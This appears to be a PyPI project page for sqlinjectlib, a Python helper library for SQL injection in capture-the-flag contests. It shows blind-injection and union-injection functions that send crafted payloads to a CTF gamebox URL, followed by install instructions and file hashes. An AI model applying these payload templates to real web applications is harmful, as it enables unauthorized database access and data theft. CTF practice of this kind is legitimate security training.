Project description

SQLInjectLib

Introduction

A library to simplify SQL injections during CTFs

Code samples

Extracted from a CTF, some parts were omitted

Blind Injection

def blind_injection(q: SQL[bool]) -> bool:
   query = f"animals1' and ({q})--"
   final_query = replace_all(query)
   c = post(
       "http://gamebox1.reply.it/dc5ff0efae41b3500b9ebc0ee9ee5a78c98f41a9/",
       data={"query": final_query},
   )
   return "ANIMALS1" in c.text

Union Injection

def union_injection(q: SQL[str]) -> str | None:
  query = f"hdjhfjdf' union select 'aa','aa;aa',{q},1--"
  final_query = replace_all(query)
  c = post(
      "http://gamebox1.reply.it/dc5ff0efae41b3500b9ebc0ee9ee5a78c98f41a9/",
      data={"query": final_query},
  )
  m = TAG_FINDER.search(c.text)
  result = m.group(1)
  return result

Installation

Install locally with:
python3 -m pip install sqlinjectlib

Project details

These details have not been verified by PyPI

Project links

GitHub Statistics

Release history Release notifications | RSS feed

0.1.2

Nov 12, 2022

This version

0.1.1

Nov 8, 2022

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

sqlinjectlib-0.1.1.tar.gz (22.0 kB view hashes)

Uploaded Nov 8, 2022 Source

Built Distribution

sqlinjectlib-0.1.1-py3-none-any.whl (24.7 kB view hashes)

Uploaded Nov 8, 2022 Python 3

Hashes for sqlinjectlib-0.1.1.tar.gz

Hashes for sqlinjectlib-0.1.1.tar.gz
Algorithm	Hash digest
SHA256	`f58ca499cf8126017583cd2e9d5abb5a27d8fb3a2063938d168004c958c6dd38`
MD5	`f738f3616d89313823714674d89e5a5b`
BLAKE2b-256	`97092427ba8fffc858cde662381f70561cf3dab48c33ab2221b24cde508d9a8a`

Hashes for sqlinjectlib-0.1.1-py3-none-any.whl

Hashes for sqlinjectlib-0.1.1-py3-none-any.whl
Algorithm	Hash digest
SHA256	`bd71e0e0d173bd90838a3a900045ca5d541e453614191cc769952f8b32448f69`
MD5	`3daa727c0bb9663d3a1d7822e8ec7cc4`
BLAKE2b-256	`e033e64c28f08bfbc5e0cb00f522cca511b2041244fbc61047b65e646b639b9d`